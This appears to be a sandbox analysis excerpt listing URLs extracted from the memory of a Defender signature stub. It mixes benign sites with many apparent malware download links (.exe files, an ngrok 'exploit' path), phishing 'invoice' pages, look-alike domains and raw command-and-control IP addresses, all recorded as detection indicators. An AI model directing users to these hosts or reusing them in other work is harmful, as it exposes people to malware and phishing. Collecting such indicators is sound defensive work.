Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tagbao.com/open
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.tattoopower.it/invoice-
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.tempuri.org/DataSet1.xsd
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.thon-samson.be/js/_notes/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.tijuanalaw.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.traramayeri.net
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.tripod.com
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://www.troman.de/cmd/cmds.txt
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.turtlecoin.lol
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.ujnc.ru/js.js
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.up.com.jo/gov/lsass.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.update-srv.info
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	String found in binary or memory: http://www.usaa.com/inet/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.usatoday.com/search/results?q=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9.com/v9tb/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9tr.com
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.vegascomtelecom.com/novo/get.php
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.com
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.coma
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.webflora.co.kr/slog/skin/setup.ini
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.webye163.cn
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.win-spy.com/update
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.windupdates.com
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.winferno.com/re/support.asp
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.wintask16.com/exc2.txt
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.wisefixer.com/
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.wosss.com/search.aspx?q=%s
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.wuweigame.com/asp/y.js
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.wuweixian.com/we_down/k2_v/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.xanga.com
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.xia3.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.xiuzhe.com/ddvan.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpassgenerator.com/software/d
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.xtzspxw.com/admin506/tt.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.yahoo.com
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.yihaha.net/
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtoba01.hpg.com.br
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.yuyu.com/?fav2
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.zixzelz1.narod.ru/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://wwwwww.f2kk.cn
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://x01c4fr.sed.doormedic.com
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://xml.fiestappc.com/feed.php?aid=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://xuanbbs.net/bbs
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://xvive.com/twiki/b.txt
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://xwjhdjylqeypyltby.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://xxx.llxxcx.cn/pv.htmwidth=0name=
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://xxx.llxxcx.cn/wm.htmwidth=0name=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://xxxxxxxxx9:8618/client/android/a.apk
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/ecpx
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://xzqpl.chujz.com/l14.gif
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://xzsite.chujz.com/soft/ad.html
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://y31uv4ra1.vo.llnwd.net/js/advancedmactuneup/macpro/mcprinfo.ini
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://yawaop.com/anna.doc
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://youssef-tawil.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://yuksekovabali.com/rgvtr6wcaw2yyy6pkz6qvrj6)
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://z360.net/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://zillot.kz/System/mysql/users.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://zistiran.com/invoice-for-you/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://zxtenrnewlaunchinworldwide.mangospot.net/.-..................................................
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://zz.8282.space/nw/ss/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
Source: MpSigStub.exe, 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp	String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://09e26c1d.ngrok.io/exploit/jprotected.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://0utl00k.net/docs
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://107.151.152.220:5658
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://1361227624.rsc.cdn77.org/v2/p2r.php?
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://145855projectframingltd-my.sharepoint.com/:b:/g/personal/jan_projectframing_com/evmq9_ggpulc
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://1591523753.rsc.cdn77.org/p2r.php?
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://645tgvew.gb.net/gtrfeef3r/?wv54544f=gv445g5g55
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://a.doko.moe/uvjwpr.sct
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://abbeyfiechestere.ru/asdf/?_truthcolor=?dramafrine
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://account.qq.com/cgi-bin/auth_forget
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://accounts-c153b9bqxw.com
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/baygoda0nuq2oey1rta2odg4rdhcqzleqzrbruu3qta5oui=
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://adegt.com/wp-includes/sodium_co
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://adverts-pistonheads.com/poste/action.php
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://agilefield53.com/rb/excelzz/index.php
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://ajcbhjehkbf.25u.com/rom/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://alexdepase.coach/wp-admin/Ic4ZVsh/
